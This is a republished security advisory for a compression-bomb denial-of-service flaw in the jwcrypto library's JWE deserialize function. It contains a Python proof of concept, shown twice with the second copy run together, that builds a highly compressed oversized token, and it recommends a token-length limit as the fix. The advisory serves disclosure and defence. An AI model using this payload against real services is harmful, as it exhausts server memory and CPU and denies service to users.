Headline
GHSA-j857-7rvv-vj97: JWCrypto vulnerable to JWT bomb Attack in `deserialize` function
Affected version
Vendor: https://github.com/latchset/jwcrypto Version: 1.5.5
Description
An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this Token, it will consume a lot of memory and processing time.
Poc
from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode, json_decode
import time
public_key = jwk.JWK()
private_key = jwk.JWK.generate(kty='RSA', size=2048)
public_key.import_key(**json_decode(private_key.export_public()))
payload = '{"u": "' + "u" * 400000000 + '", "uu":"' + "u" * 400000000 + '"}'
protected_header = {
"alg": "RSA-OAEP-256",
"enc": "A256CBC-HS512",
"typ": "JWE",
"zip": "DEF",
"kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
recipient=public_key,
protected=protected_header)
enc = jwetoken.serialize(compact=True)
print("-----uncompress-----")
print(len(enc))
begin = time.time()
jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)
print(time.time() - begin)
print("-----compress-----")
payload = '{"u": "' + "u" * 400000 + '", "uu":"' + "u" * 400000 + '"}'
protected_header = {
"alg": "RSA-OAEP-256",
"enc": "A256CBC-HS512",
"typ": "JWE",
"kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
recipient=public_key,
protected=protected_header)
enc = jwetoken.serialize(compact=True)
print(len(enc))
begin = time.time()
jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)
print(time.time() - begin)
It can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer. <img width="172" alt="image" src="https://github.com/latchset/jwcrypto/assets/133195620/23193327-3cd7-499a-b5aa-28c56af92785">
Mitigation
To mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also been adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing attackers from exploiting this vulnerability with high compression ratio tokens.
References
[1] CVE-2024-21319
Affected version
Vendor: https://github.com/latchset/jwcrypto
Version: 1.5.5
Description
An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.
When the server processes this Token, it will consume a lot of memory and processing time.
Poc
from jwcrypto import jwk, jwe from jwcrypto.common import json_encode, json_decode import time public_key = jwk.JWK() private_key = jwk.JWK.generate(kty=’RSA’, size=2048) public_key.import_key(**json_decode(private_key.export_public()))
payload = ‘{"u": "’ + “u” * 400000000 + ‘", "uu":"’ + “u” * 400000000 + ‘"}’ protected_header = { "alg": "RSA-OAEP-256", "enc": "A256CBC-HS512", "typ": "JWE", "zip": "DEF", "kid": public_key.thumbprint(), } jwetoken = jwe.JWE(payload.encode(‘utf-8’), recipient=public_key, protected=protected_header) enc = jwetoken.serialize(compact=True)
print("-----uncompress-----")
print(len(enc))
begin = time.time()
jwetoken = jwe.JWE() jwetoken.deserialize(enc, key=private_key)
print(time.time() - begin)
print("-----compress-----")
payload = ‘{"u": "’ + “u” * 400000 + ‘", "uu":"’ + “u” * 400000 + ‘"}’ protected_header = { "alg": "RSA-OAEP-256", "enc": "A256CBC-HS512", "typ": "JWE", "kid": public_key.thumbprint(), } jwetoken = jwe.JWE(payload.encode(‘utf-8’), recipient=public_key, protected=protected_header) enc = jwetoken.serialize(compact=True)
print(len(enc))
begin = time.time()
jwetoken = jwe.JWE() jwetoken.deserialize(enc, key=private_key)
print(time.time() - begin)
It can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer.
Mitigation
To mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also
been adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing
attackers from exploiting this vulnerability with high compression ratio tokens.
References
[1] CVE-2024-21319
References
- GHSA-j857-7rvv-vj97
- latchset/jwcrypto@90477a3
Related news
Red Hat Security Advisory 2024-4522-03 - An update is now available for Red Hat Ansible Automation Platform 2.4. Issues addressed include a denial of service vulnerability.